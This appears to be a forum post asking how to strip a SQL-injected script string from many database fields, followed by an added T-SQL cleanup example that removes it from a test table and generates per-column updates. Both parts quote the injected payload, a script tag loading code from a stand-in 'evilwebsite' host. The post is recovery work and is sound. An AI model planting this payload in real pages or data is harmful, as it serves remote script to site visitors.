Disclaimer: I do not manage SQL Server for this customer and I know this is bad. This is to fix the end result of a SQL injection attack. New customer, getting paid to fix and will make recommendations afterwards. It is in MS SQL 2005.
Their backups suck. They are already working with some web devs to fix the code on their site so this can't happen in the future and I have revamped the backup scheme to something that actually, you know... backs up somewhere.
There was a SQL injection attack, the string: "></title><script src="http://evilwebsite/file.php"></script><!-- was inserted just before the real data in gobs of fields in multiple tables. Note the odd number of "'s
I am trying to write a SQL replace query to wipe out the evil string with nothing to repair the DB. It is not ideal but it is what we've got. However, the jackasses who did the attack are smarter than me in SQL and stuck a " in the string so my commands fail due to the unclosed quotes. Can one of you geniuses show me how to write a query that will do what I need with the screwy quotes?
I have the infected table up on another server right now to test on.
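
Added example, not part of the original post: a T-SQL cleanup sketch for the string quoted above, written for SQL Server 2005 and meant to be run on the test copy first. The temp table #products, its columns and its rows are constructed for illustration. The final query goes beyond the single-table case and generates one UPDATE per character column in the database for review.

```sql
-- Constructed demo table and rows (assumption: not the customer's schema).
-- T-SQL string literals are delimited by single quotes, so the double quotes
-- inside the injected string are ordinary characters and need no escaping.
DECLARE @bad nvarchar(200);
SET @bad = N'"></title><script src="http://evilwebsite/file.php"></script><!--';

CREATE TABLE #products (id int PRIMARY KEY, name nvarchar(200), descr ntext);
INSERT INTO #products VALUES (1, @bad + N'Widget', @bad + N'A blue widget');
INSERT INTO #products VALUES (2, N'Gadget', N'Untouched row');

-- Preview the rows that will change before touching anything.
SELECT id, name FROM #products WHERE name LIKE N'%' + @bad + N'%';

BEGIN TRANSACTION;

UPDATE #products
   SET name = REPLACE(name, @bad, N'')
 WHERE name LIKE N'%' + @bad + N'%';

-- REPLACE does not accept text/ntext columns; cast to nvarchar(max),
-- which is available from SQL Server 2005 onward.
UPDATE #products
   SET descr = REPLACE(CAST(descr AS nvarchar(max)), @bad, N'')
 WHERE descr LIKE N'%' + @bad + N'%';

-- Should return 0; inspect the data, then COMMIT (or ROLLBACK if it looks wrong).
SELECT COUNT(*) AS still_infected
  FROM #products
 WHERE name LIKE N'%' + @bad + N'%' OR descr LIKE N'%' + @bad + N'%';

COMMIT TRANSACTION;

-- Generate (do not execute blindly) one UPDATE per character column in every
-- base table. Review the output and run it in a batch that declares @bad as above.
SELECT 'UPDATE ' + QUOTENAME(c.TABLE_SCHEMA) + '.' + QUOTENAME(c.TABLE_NAME)
     + ' SET ' + QUOTENAME(c.COLUMN_NAME) + ' = REPLACE(CAST(' + QUOTENAME(c.COLUMN_NAME)
     + ' AS ' + CASE WHEN c.DATA_TYPE IN ('nchar', 'nvarchar', 'ntext')
                     THEN 'nvarchar(max)' ELSE 'varchar(max)' END
     + '), @bad, '''') WHERE ' + QUOTENAME(c.COLUMN_NAME) + ' LIKE ''%'' + @bad + ''%'';'
  FROM INFORMATION_SCHEMA.COLUMNS AS c
  JOIN INFORMATION_SCHEMA.TABLES AS t
    ON t.TABLE_SCHEMA = c.TABLE_SCHEMA AND t.TABLE_NAME = c.TABLE_NAME
 WHERE t.TABLE_TYPE = 'BASE TABLE'
   AND c.DATA_TYPE IN ('char', 'varchar', 'text', 'nchar', 'nvarchar', 'ntext');
```

The only single quotes that need doubling are ones that occur inside the literal itself, and this string contains none.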